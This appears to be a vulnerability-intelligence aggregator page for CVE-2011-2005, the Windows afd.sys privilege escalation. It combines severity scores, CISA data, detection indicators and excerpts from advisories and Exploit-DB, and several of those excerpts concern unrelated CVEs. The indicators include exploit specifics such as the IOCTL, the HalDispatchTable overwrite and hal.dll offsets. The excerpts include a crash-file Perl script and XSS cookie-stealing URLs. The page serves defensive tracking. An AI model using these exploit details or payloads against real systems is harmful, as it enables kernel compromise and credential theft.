CVE-2011-2005
published 2011-10-12CVE-2011-2005: afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly validate user-mode input passed to kernel…
PriorityP278high7.8CVSS 3.1
AVLACLPRNUIRSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-04-18
Exploited in the wild
EPSS
31.76%
98.1th percentile
afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability."
Detection & IOCsextracted from sources · hover to see the quote
otherZwDeviceIoControlFile / NtDeviceIoControlFile with IOCTL 0x000120bb, inputbuffer 0x1004, inputbuffer_size 0x108, outputbuffer HalDispatchTable+0x4+1, outputbuffer_size 0x0↗
bytes↗
irpstuff: 41414141 42424242 00000000 44444444 01000000 e800 34 f000 45*231
- →Monitor for NtQueryIntervalProfile calls with input value 0x1337 immediately following a DeviceIoControl to afd.sys; this is the trigger step to execute the kernel shellcode after HalDispatchTable overwrite. ↗
- →Alert on WSASocket creating a TCP socket that is immediately connected to 127.0.0.1:4455 (a closed port) to obtain a CONNECTING-state socket handle for use in the malicious DeviceIoControl call. ↗
- →FIN6 threat actor has weaponized CVE-2011-2005 for local privilege escalation to kernel-level privileges; correlate afd.sys exploitation indicators with FIN6 TTPs such as Cobalt Strike, Mimikatz, and FrameworkPOS activity.
- →The exploit targets 32-bit Windows XP SP3 and Windows Server 2003 SP2 exclusively; flag execution of exploit code on these OS versions with the specific hal.dll offsets HaliQuerySystemInformation (XP: +0x16bba, 2K3: +0x1fa1e) and HalpSetSystemInformation (XP: +0x19436, 2K3: +0x21c60). ↗
- ·The standalone Python exploit (EDB-18176) requires the attacker to specify the target OS (-O XP or -O 2K3) as the hal.dll offsets differ between Windows XP SP3 and Windows Server 2003 SP2; incorrect targeting will fail or crash the system. ↗
- ·The exploit is limited to 32-bit (x86) systems only; the Metasploit module explicitly rejects WOW64 and 64-bit targets. ↗
- ·The exploit requires a local (non-SYSTEM) session; the Metasploit module aborts if the session is already running as SYSTEM. ↗
- ·Post-exploitation token restoration is critical for system stability; skipping the restore step after shellcode execution risks system instability or BSOD. ↗
CVSS provenance
nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
vulncheck7.8HIGH
cisa7.8HIGH
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Microsoft Ancillary Function Driver (afd.sys) Improper Input Validation Vulnerability
cisa·2022-03-28·CVSS 7.8
CVE-2011-2005 [HIGH] CWE-264 Microsoft Ancillary Function Driver (afd.sys) Improper Input Validation Vulnerability
Vulnerability: Microsoft Ancillary Function Driver (afd.sys) Improper Input Validation Vulnerability
Affected: Microsoft Ancillary Function Driver (afd.sys)
afd.sys in the Ancillary Function Driver in Microsoft Windows does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2011-2005
Remediation Due Date: 2022-04-18
Red Hat
squid: buffer overflow flaw in Squid's Gopher reply parser (SQUID-2011:3)
vendor_redhat·2011-08-28·CVSS 5.0
CVE-2011-3205 [MEDIUM] squid: buffer overflow flaw in Squid's Gopher reply parser (SQUID-2011:3)
squid: buffer overflow flaw in Squid's Gopher reply parser (SQUID-2011:3)
Buffer overflow in the gopherToHTML function in gopher.cc in the Gopher reply parser in Squid 3.0 before 3.0.STABLE26, 3.1 before 3.1.15, and 3.2 before 3.2.0.11 allows remote Gopher servers to cause a denial of service (memory corruption and daemon restart) or possibly have unspecified other impact via a long line in a response. NOTE: This issue exists because of a CVE-2005-0094 regression.
Package: squid (Red Hat Enterprise Linux 4) - Not affected
Package: squid (Red Hat Enterprise Linux 5) - Not affected
Red Hat
php: extract() can overwrite $GLOBALS and $this when using EXTR_OVERWRITE
vendor_redhat·2010-12-08·CVSS 7.5
CVE-2011-0752 [HIGH] php: extract() can overwrite $GLOBALS and $this when using EXTR_OVERWRITE
php: extract() can overwrite $GLOBALS and $this when using EXTR_OVERWRITE
The extract function in PHP before 5.2.15 does not prevent use of the EXTR_OVERWRITE parameter to overwrite (1) the GLOBALS superglobal array and (2) the this variable, which allows context-dependent attackers to bypass intended access restrictions by modifying data structures that were not intended to depend on external input, a related issue to CVE-2005-2691 and CVE-2006-3758.
Statement: We do not consider this flaw to be a security issue as it is only exploitable by the script author. No trust boundary is crossed.
This issue did not affect the versions of PHP as shipped with Red Hat Enterprise Linux 3, 4, or 5 (php). This issue was addressed in the php53 packages as shipped in Red Hat Enterprise Linux 5 before t
GHSA
GHSA-8q8w-v8pg-496j: afd
ghsa_unreviewed·2022-05-14
CVE-2011-2005 [HIGH] GHSA-8q8w-v8pg-496j: afd
afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability."
VulnCheck
Microsoft Ancillary Function Driver (afd.sys) Improper Input Validation Vulnerability
vulncheck·2011·CVSS 7.8
CVE-2011-2005 [HIGH] CWE-264 Microsoft Ancillary Function Driver (afd.sys) Improper Input Validation Vulnerability
Microsoft Ancillary Function Driver (afd.sys) Improper Input Validation Vulnerability
afd.sys in the Ancillary Function Driver in Microsoft Windows does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application.
Affected: Microsoft Ancillary Function Driver (afd.sys)
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Exploit PoC: https://vulncheck.com/xdb/f986d5f654bf
Remediation Due: 2022-04-18
No detection rules found.
Exploit-DB
Microsoft Windows - 'AfdJoinLeaf' Local Privilege Escalation (MS11-080) (Metasploit)
exploitdb·2012-10-10
CVE-2011-2005 Microsoft Windows - 'AfdJoinLeaf' Local Privilege Escalation (MS11-080) (Metasploit)
Microsoft Windows - 'AfdJoinLeaf' Local Privilege Escalation (MS11-080) (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/windows/priv'
class Metasploit3 'MS11-080 AfdJoinLeaf Privilege Escalation',
'Description' => %q{
This module exploits a flaw in the AfdJoinLeaf function of the
afd.sys driver to overwrite data in kernel space. An address
within the HalDispatchTable is overwritten and when triggered
with a call to NtQueryIntervalProfile will execute shellcode.
This module will elevate itself to SY
Exploit-DB
Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080)
exploitdb·2011-11-30·CVSS 7.8
CVE-2011-2005 [HIGH] Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080)
Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080)
---
################################################################################
######### MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit ########
######### Author: [email protected] - Matteo Memelli ########
######### Spaghetti & Pwnsauce ########
######### yuck! 0xbaadf00d Elwood@mac&cheese.com ########
######### ########
######### Thx to dookie(lifesaver)2000ca, dijital1 and ronin ########
######### for helping out! ########
######### ########
######### To my Master Shifu muts: ########
######### "So that's it, I just need inner peace?" ;) ########
######### ########
######### Exploit tested on the following 32bits systems: ########
######### Win XPSP3 Eng, Win 2K3SP2 Standard/Enterprise Eng
Exploit-DB
Bugbear FlatOut 2005 - '.bed' File Buffer Overflow
exploitdb·2011-11-30
CVE-2011-5173 Bugbear FlatOut 2005 - '.bed' File Buffer Overflow
Bugbear FlatOut 2005 - '.bed' File Buffer Overflow
---
#Exploit Title: FlatOut Malformed .bed file Buffer Overflow
# Date: 11-29-11
# Author: Silent Dream
# Software Link: http://www.gog.com/en/gamecard/flatout
# Version: Latest
# Tested on: Windows 7
#Tested on GOG.com copy of FlatOut. Exception offset = 61616161
#Multiple .bed files are vulnerable to buffer overflows...too many to even begin to list..
my $file = "playlist_0.bed";
my $head = "Title = \"";
my $junk = "a" x 3000 . "\"\r";
my $tail = "Loop = {" . "\r}";
open($File, ">$file");
print $File $head.$junk.$tail;
close($FILE);
print "Overwrite the original playlist_0.bed file in %program files%\\GOG.com\\FlatOut\\data\\music and launch flatout.exe...wait for the crash\r\n";
Exploit-DB
Microsoft Visual Studio Report Viewer 2005 Control - Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2011-08-09
CVE-2011-1976 Microsoft Visual Studio Report Viewer 2005 Control - Multiple Cross-Site Scripting Vulnerabilities
Microsoft Visual Studio Report Viewer 2005 Control - Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/49033/info
Microsoft Visual Studio is prone to multiple cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to spoof content or disclose sensitive information.
https://www.example.com/Reserved.ReportViewerWebControl.axd?Mode=true&ReportID=%3CarbitraryIDvalue%3E&ControlID=%3CvalidControlID%3E&Culture=1033&UICulture=1033&ReportStack=1&OpType=SessionKeepAlive&TimerMethod=KeepAliveMethodctl00_PlaceHolderMain_SiteTopUsersByHits_ctl00T
Exploit-DB
ZipWiz 2005 5.0 - '.zip' Buffer Corruption
exploitdb·2011-07-08
ZipWiz 2005 5.0 - '.zip' Buffer Corruption
ZipWiz 2005 5.0 - '.zip' Buffer Corruption
---
#!/usr/bin/perl
#
#[+]Exploit Title: ZipWiz 2005 v5.0 .ZIP File Buffer Corruption Exploit
#[+]Date: 08\07\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/ZipWiz-2005/3000-2250_4-10011590.html
#[+]Version: v5.0
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#
use strict;
use warnings;
my $filename = "Exploit.zip";
print "\n\n\t\tZipWiz 2005 v5.0 .ZIP File Buffer Corruption Exploit\n";
print "\t\tCreated by C4SS!0 G0M3S\n";
print "\t\tE-mail Louredo_\@hotmail.com\n";
print "\t\tSite www.exploit-br.org/\n\n";
sleep(1);
my $head = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";
my $head2 = "\x50\x4B\x01\x02
Exploit-DB
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)
exploitdb·2011-02-08
CVE-2008-5416 Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)
---
##
# $Id: ms09_004_sp_replwritetovarbin_sqli.rb 11730 2011-02-08 23:31:44Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection',
'Description' => %q{
A heap-based buffer overflow can occur when calling the undocumented
"sp_replwritetovarbin" extended stored procedure. This vulnerability affects
all versions of Microsoft SQL Server 2000 and 2005, Window
Exploit-DB
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
exploitdb·2011-01-24
CVE-2008-5416 Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
---
##
# $Id: ms09_004_sp_replwritetovarbin.rb 11631 2011-01-24 19:37:58Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SQL Server sp_replwritetovarbin Memory Corruption',
'Description' => %q{
A heap-based buffer overflow can occur when calling the undocumented
"sp_replwritetovarbin" extended stored procedure. This vulnerability affects
all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,
and Microsoft Desktop
Exploit-DB
PAFaq - Question Cross-Site Scripting
exploitdb·2005-06-20
CVE-2005-2011 PAFaq - Question Cross-Site Scripting
PAFaq - Question Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/14001/info
paFaq is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/pafaq/index.php?act=Question&id=1%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
Zscaler
Zscaler found Multiple Security Vulnerabilities | 11-11-2011
blogs_zscaler·CVSS 9.3
[CRITICAL] Zscaler found Multiple Security Vulnerabilities | 11-11-2011
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Threat Intel
FIN6 (FIN6, Magecart Group 6, ITG08)
threat_intel
FIN6 (FIN6, Magecart Group 6, ITG08)
# Threat Actor Profile: FIN6
ATT&CK ID: G0037
Also known as: FIN6, Magecart Group 6, ITG08, Skeleton Spider, TAAL, Camouflage Tempest
## Overview
FIN6 is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)
## Techniques (TTPs)
### Resource Development
- T1588.002 Tool
Usage: FIN6 has obtained and used tools such as Mimikatz, Cobalt Strike, and AdFind.(Citation: Security Intelligence More Eggs Aug 2019)(Citation: FireEye FIN6 Apr 2019)
### Initial Access
- T1566.001 Spearphishing Attachment
Usage: FIN6 has targeted victims with e-mails containing ma
Bugzilla
CVE-2011-3205 squid: buffer overflow flaw in Squid's Gopher reply parser (SQUID-2011:3)
bugzilla·2011-08-30·CVSS 5.0
CVE-2011-3205 [MEDIUM] CVE-2011-3205 squid: buffer overflow flaw in Squid's Gopher reply parser (SQUID-2011:3)
CVE-2011-3205 squid: buffer overflow flaw in Squid's Gopher reply parser (SQUID-2011:3)
A flaw was reported [1] in how Squid parsed responses from Gopher servers. This flaw could result in a buffer overflow if a Gopher server were to return a line longer than 4096 bytes, leading to memory corruption and a crash. This flaw is an extension of SQUID-2005:1 (or CVE-2005-0094) in Squid 3.x, due to increased packet read sizes. A malicious user could setup a fake Gopher server and forward requests to it through Squid. A specially crafted response from that server could cause Squid to restart.
This has been corrected in upstream versions 3.2.0.11, 3.1.15, and 3.0.STABLE26. Patches for 3.0 [2], 3.1 [3], and 3.2 [4] are available.
[1] http://www.squid-cache.org/Advisories/SQUID-2011_3.txt
[2] htt
Bugzilla
CVE-2011-0284 krb5 (krb5kdc): Double-free flaw by handling error messages upon receiving certain AS_REQ's (MITKRB5-SA-2011-003)
bugzilla·2011-02-01·CVSS 5.0
CVE-2011-0284 [MEDIUM] CVE-2011-0284 krb5 (krb5kdc): Double-free flaw by handling error messages upon receiving certain AS_REQ's (MITKRB5-SA-2011-003)
CVE-2011-0284 krb5 (krb5kdc): Double-free flaw by handling error messages upon receiving certain AS_REQ's (MITKRB5-SA-2011-003)
A double-free flaw was found in the way the MIT Kerberos
KDC handled initial authentication requests (AS-REQ), when
the KDC was configured to provide the PKINIT capability.
A remote attacker could use this flaw to cause the KDC
daemon to abort by using a specially-crafted AS-REQ request.
Different vulnerability than CVE-2010-1320 and CVE-2005-1174.
Discussion:
Created attachment 476397
Proposed patch from Nalin Dahyabhai to fix the issue
---
This issue did NOT affect the versions of the krb5 package, as shipped
with Red Hat Enterprise Linux 3, 4, or 5.
This issue affects the version of the krb5 package, as shipped
with Red Hat Enterprise Linux 6.
--
This i
Bugzilla
CVE-2011-0530 NBD: CVE-2005-3534 reintroduced in upstream nbd-v2.9.0 version
bugzilla·2011-01-28·CVSS 7.5
CVE-2011-0530 [HIGH] CVE-2011-0530 NBD: CVE-2005-3534 reintroduced in upstream nbd-v2.9.0 version
CVE-2011-0530 NBD: CVE-2005-3534 reintroduced in upstream nbd-v2.9.0 version
Originally, CVE-2005-3534:
[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3534
has been assigned to NBD and addressed in nbd-v2.8.3 version:
[2] http://sourceforge.net/project/shownotes.php?release_id=380202&group_id=13229
via changeset:
[3] https://github.com/yoe/nbd/commit/4ed24fe0d64c7cc9963c57b52cad1555ad7c6b60
But nbd-v2.9.0:
[4] http://sourceforge.net/projects/nbd/files/nbd/2.9.0/
contains the issue again. This flaw was fixed second time
via upstream changeset:
[5] https://github.com/yoe/nbd/commit/3ef52043861ab16352d49af89e048ba6339d6df8
References:
[6] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=611187
Discussion:
This issue affects the versions of the nbd package, as shipped
with
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-080https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A13114https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-080https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A13114https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2011-2005
2011-10-12
Published
2022-03-28
Added to CISA KEV
Exploited in the wild